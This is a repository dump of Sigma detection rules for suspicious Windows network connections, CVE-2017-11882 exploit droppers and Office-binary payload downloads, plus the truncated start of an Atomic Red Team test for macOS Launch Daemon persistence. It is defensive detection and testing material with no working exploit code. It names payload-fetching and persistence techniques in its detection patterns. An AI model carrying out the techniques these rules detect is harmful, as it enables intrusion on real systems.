service: sysmon 16 | detection: 17 | selection: 18 | EventID: 3 19 | Initiated: 'true' 20 | DestinationHostname: 21 | - '*dl.dropboxusercontent.com' 22 | - '*.pastebin.com' 23 | - '*.githubusercontent.com' # includes both gists and github repositories 24 | Image: 'C:\Windows\\*' 25 | condition: selection 26 | falsepositives: 27 | - 'Unknown' 28 | level: high 29 | 30 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_exploit_cve_2017_11882.yml: -------------------------------------------------------------------------------- 1 | title: Droppers exploiting CVE-2017-11882 2 | id: 678eb5f4-8597-4be6-8be7-905e4234b53a 3 | status: experimental 4 | description: Detects exploits that use CVE-2017-11882 to start EQNEDT32.EXE and other sub processes like mshta.exe 5 | references: 6 | - https://www.hybrid-analysis.com/sample/2a4ae284c76f868fc51d3bb65da8caa6efacb707f265b25c30f34250b76b7507?environmentId=100 7 | - https://www.google.com/url?hl=en&q=https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about&source=gmail&ust=1511481120837000&usg=AFQjCNGdL7gVwLXaNSl2Td8ylDYbSJFmPw 8 | author: Florian Roth 9 | date: 2017/11/23 10 | tags: 11 | - attack.defense_evasion 12 | - attack.t1211 13 | logsource: 14 | category: process_creation 15 | product: windows 16 | detection: 17 | selection: 18 | ParentImage: '*\EQNEDT32.EXE' 19 | condition: selection 20 | fields: 21 | - CommandLine 22 | falsepositives: 23 | - unknown 24 | level: critical 25 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_susp_msoffice.yml: -------------------------------------------------------------------------------- 1 | title: Malicious payload download via Office binaries 2 | id: 0c79148b-118e-472b-bdb7-9b57b444cc19 3 | status: experimental 4 | description: Downloads payload from remote server 5 | references: 6 | - https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OtherMSBinaries/Powerpnt.yml 7 | - https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191 8 | - Reegun J (OCBC Bank) 9 | author: Beyu Denis, oscd.community 10 | date: 2019/10/26 11 | modified: 2019/11/04 12 | tags: 13 | - attack.command_and_control 14 | - attack.t1105 15 | level: high 16 | logsource: 17 | category: process_creation 18 | product: windows 19 | detection: 20 | selection: 21 | Image|endswith: 22 | - '\powerpnt.exe' 23 | - '\winword.exe' 24 | - '\excel.exe' 25 | CommandLine|contains: 'http' 26 | condition: selection 27 | falsepositives: 28 | - Unknown 29 | -------------------------------------------------------------------------------- /elemental/media/atomics/T1160.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | attack_technique: T1160 3 | display_name: Launch Daemon 4 | 5 | atomic_tests: 6 | - name: Launch Daemon 7 | description: | 8 | Utilize LaunchDaemon to launch `Hello World` 9 | 10 | supported_platforms: 11 | - macos 12 | 13 | 14 | executor: 15 | name: manual 16 | steps: | 17 | 1. Place the following file (com.example.hello) in /System/Library/LaunchDaemons or /Library/LaunchDaemons 18 | 2. 19 | 20 | 21 |